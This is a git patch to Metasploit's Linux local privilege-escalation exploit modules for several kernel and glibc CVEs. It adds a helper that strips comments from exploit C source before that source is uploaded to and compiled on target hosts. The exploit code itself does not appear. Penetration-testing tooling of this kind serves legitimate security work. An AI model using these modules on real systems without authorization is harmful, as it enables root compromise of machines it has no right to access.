From fcb512878c19c156345d39880a6f0846749f3d55 Mon Sep 17 00:00:00 2001 From: Brendan Coles Date: Sun, 16 Dec 2018 14:11:54 +0000 Subject: [PATCH] Add strip_comments method to Linux local exploits --- .../linux/local/af_packet_chocobo_root_priv_esc.rb | 6 +++++- .../linux/local/af_packet_packet_set_ring_priv_esc.rb | 6 +++++- .../exploits/linux/local/bpf_sign_extension_priv_esc.rb | 6 +++++- modules/exploits/linux/local/glibc_realpath_priv_esc.rb | 6 +++++- .../linux/local/nested_namespace_idmap_limit_priv_esc.rb | 8 ++++++-- modules/exploits/linux/local/rds_priv_esc.rb | 6 +++++- modules/exploits/linux/local/recvmmsg_priv_esc.rb | 6 +++++- modules/exploits/linux/local/ufo_privilege_escalation.rb | 6 +++++- 8 files changed, 41 insertions(+), 9 deletions(-) diff --git a/modules/exploits/linux/local/af_packet_chocobo_root_priv_esc.rb b/modules/exploits/linux/local/af_packet_chocobo_root_priv_esc.rb index 5f880fd8ef..5e4c09c1c9 100644 --- a/modules/exploits/linux/local/af_packet_chocobo_root_priv_esc.rb +++ b/modules/exploits/linux/local/af_packet_chocobo_root_priv_esc.rb @@ -115,6 +115,10 @@ class MetasploitModule < Msf::Exploit::Local cmd_exec "chmod +x #{path}" end + def strip_comments(c_code) + c_code.gsub(%r{/\*.*?\*/}m, '').gsub(%r{^\s*//.*$}, '') + end + def exploit_data(file) ::File.binread ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2016-8655', file) end @@ -211,7 +215,7 @@ class MetasploitModule < Msf::Exploit::Local executable_path = "#{base_dir}/#{executable_name}" if live_compile? vprint_status 'Live compiling exploit on system...' - upload_and_compile executable_path, exploit_data('chocobo_root.c') + upload_and_compile executable_path, strip_comments(exploit_data('chocobo_root.c')) else vprint_status 'Dropping pre-compiled exploit on system...' upload_and_chmodx executable_path, exploit_data('chocobo_root') diff --git a/modules/exploits/linux/local/af_packet_packet_set_ring_priv_esc.rb b/modules/exploits/linux/local/af_packet_packet_set_ring_priv_esc.rb index b3b0cebcc4..2c6e07a203 100644 --- a/modules/exploits/linux/local/af_packet_packet_set_ring_priv_esc.rb +++ b/modules/exploits/linux/local/af_packet_packet_set_ring_priv_esc.rb @@ -106,6 +106,10 @@ class MetasploitModule < Msf::Exploit::Local cmd_exec "chmod +x #{path}" end + def strip_comments(c_code) + c_code.gsub(%r{/\*.*?\*/}m, '').gsub(%r{^\s*//.*$}, '') + end + def exploit_data(file) ::File.binread ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2017-7308', file) end @@ -201,7 +205,7 @@ class MetasploitModule < Msf::Exploit::Local executable_path = "#{base_dir}/#{executable_name}" if live_compile? vprint_status 'Live compiling exploit on system...' - upload_and_compile executable_path, exploit_data('poc.c') + upload_and_compile executable_path, strip_comments(exploit_data('poc.c')) rm_f "#{executable_path}.c" else vprint_status 'Dropping pre-compiled exploit on system...' diff --git a/modules/exploits/linux/local/bpf_sign_extension_priv_esc.rb b/modules/exploits/linux/local/bpf_sign_extension_priv_esc.rb index b6d9ff756b..0bda321148 100644 --- a/modules/exploits/linux/local/bpf_sign_extension_priv_esc.rb +++ b/modules/exploits/linux/local/bpf_sign_extension_priv_esc.rb @@ -131,6 +131,10 @@ class MetasploitModule < Msf::Exploit::Local cmd_exec "chmod +x #{path}" end + def strip_comments(c_code) + c_code.gsub(%r{/\*.*?\*/}m, '').gsub(%r{^\s*//.*$}, '') + end + def exploit_data(file) ::File.binread ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2017-16995', file) end @@ -214,7 +218,7 @@ class MetasploitModule < Msf::Exploit::Local executable_path = "#{base_dir}/#{executable_name}" if live_compile? vprint_status 'Live compiling exploit on system...' - upload_and_compile executable_path, exploit_data('exploit.c') + upload_and_compile executable_path, strip_comments(exploit_data('exploit.c')) else vprint_status 'Dropping pre-compiled exploit on system...' upload_and_chmodx executable_path, exploit_data('exploit.out') diff --git a/modules/exploits/linux/local/glibc_realpath_priv_esc.rb b/modules/exploits/linux/local/glibc_realpath_priv_esc.rb index 8d906eb751..5759fca587 100644 --- a/modules/exploits/linux/local/glibc_realpath_priv_esc.rb +++ b/modules/exploits/linux/local/glibc_realpath_priv_esc.rb @@ -102,6 +102,10 @@ class MetasploitModule < Msf::Exploit::Local cmd_exec "chmod +x #{path}" end + def strip_comments(c_code) + c_code.gsub(%r{/\*.*?\*/}m, '').gsub(%r{^\s*//.*$}, '') + end + def exploit_data(file) ::File.binread ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2018-1000001', file) end @@ -196,7 +200,7 @@ class MetasploitModule < Msf::Exploit::Local @executable_path = "#{base_dir}/#{executable_name}" if live_compile? vprint_status 'Live compiling exploit on system...' - upload_and_compile @executable_path, exploit_data('RationalLove.c') + upload_and_compile @executable_path, strip_comments(exploit_data('RationalLove.c')) else vprint_status 'Dropping pre-compiled exploit on system...' upload_and_chmodx @executable_path, exploit_data('RationalLove') diff --git a/modules/exploits/linux/local/nested_namespace_idmap_limit_priv_esc.rb b/modules/exploits/linux/local/nested_namespace_idmap_limit_priv_esc.rb index 21cc17a6ca..51c56909a0 100644 --- a/modules/exploits/linux/local/nested_namespace_idmap_limit_priv_esc.rb +++ b/modules/exploits/linux/local/nested_namespace_idmap_limit_priv_esc.rb @@ -119,6 +119,10 @@ class MetasploitModule < Msf::Exploit::Local chmod path, 0755 end + def strip_comments(c_code) + c_code.gsub(%r{/\*.*?\*/}m, '').gsub(%r{^\s*//.*$}, '') + end + def exploit_data(file) ::File.binread ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2018-18955', file) end @@ -213,8 +217,8 @@ class MetasploitModule < Msf::Exploit::Local subshell_path = "#{base_dir}/#{subshell_name}" if live_compile? vprint_status 'Live compiling exploit on system...' - upload_and_compile subuid_shell_path, exploit_data('subuid_shell.c') - upload_and_compile subshell_path, exploit_data('subshell.c') + upload_and_compile subuid_shell_path, strip_comments(exploit_data('subuid_shell.c')) + upload_and_compile subshell_path, strip_comments(exploit_data('subshell.c')) else vprint_status 'Dropping pre-compiled exploit on system...' upload_and_chmodx subuid_shell_path, exploit_data('subuid_shell.out') diff --git a/modules/exploits/linux/local/rds_priv_esc.rb b/modules/exploits/linux/local/rds_priv_esc.rb index fd7fdd516c..79d2f962a4 100644 --- a/modules/exploits/linux/local/rds_priv_esc.rb +++ b/modules/exploits/linux/local/rds_priv_esc.rb @@ -103,6 +103,10 @@ class MetasploitModule < Msf::Exploit::Local register_file_for_cleanup path end + def strip_comments(c_code) + c_code.gsub(%r{/\*.*?\*/}m, '').gsub(%r{^\s*//.*$}, '') + end + def exploit_data(file) ::File.binread ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2010-3904', file) end @@ -169,7 +173,7 @@ class MetasploitModule < Msf::Exploit::Local executable_path = "#{base_dir}/#{executable_name}" if live_compile? vprint_status 'Live compiling exploit on system...' - upload_and_compile executable_path, exploit_data('rds-fail.c') + upload_and_compile executable_path, strip_comments(exploit_data('rds-fail.c')) else vprint_status 'Dropping pre-compiled exploit on system...' arch = kernel_hardware diff --git a/modules/exploits/linux/local/recvmmsg_priv_esc.rb b/modules/exploits/linux/local/recvmmsg_priv_esc.rb index 6e149338ad..774d548065 100644 --- a/modules/exploits/linux/local/recvmmsg_priv_esc.rb +++ b/modules/exploits/linux/local/recvmmsg_priv_esc.rb @@ -89,6 +89,10 @@ class MetasploitModule < Msf::Exploit::Local cmd_exec "chmod +x #{path}" end + def strip_comments(c_code) + c_code.gsub(%r{/\*.*?\*/}m, '').gsub(%r{^\s*//.*$}, '') + end + def exploit_data(file) ::File.binread ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-0038', file) end @@ -160,7 +164,7 @@ class MetasploitModule < Msf::Exploit::Local executable_path = "#{base_dir}/#{executable_name}" if live_compile? vprint_status 'Live compiling exploit on system...' - upload_and_compile executable_path, exploit_data('recvmmsg.c') + upload_and_compile executable_path, strip_comments(exploit_data('recvmmsg.c')) rm_f "#{executable_path}.c" else vprint_status 'Dropping pre-compiled exploit on system...' diff --git a/modules/exploits/linux/local/ufo_privilege_escalation.rb b/modules/exploits/linux/local/ufo_privilege_escalation.rb index 6042ddb51b..58dceb74a7 100644 --- a/modules/exploits/linux/local/ufo_privilege_escalation.rb +++ b/modules/exploits/linux/local/ufo_privilege_escalation.rb @@ -108,6 +108,10 @@ class MetasploitModule < Msf::Exploit::Local cmd_exec "chmod +x #{path}" end + def strip_comments(c_code) + c_code.gsub(%r{/\*.*?\*/}m, '').gsub(%r{^\s*//.*$}, '') + end + def exploit_data(file) ::File.binread ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2017-1000112', file) end @@ -198,7 +202,7 @@ class MetasploitModule < Msf::Exploit::Local executable_path = "#{base_dir}/#{executable_name}" if live_compile? vprint_status 'Live compiling exploit on system...' - upload_and_compile executable_path, exploit_data('exploit.c') + upload_and_compile executable_path, strip_comments(exploit_data('exploit.c')) else vprint_status 'Dropping pre-compiled exploit on system...' upload_and_chmodx executable_path, exploit_data('exploit.out')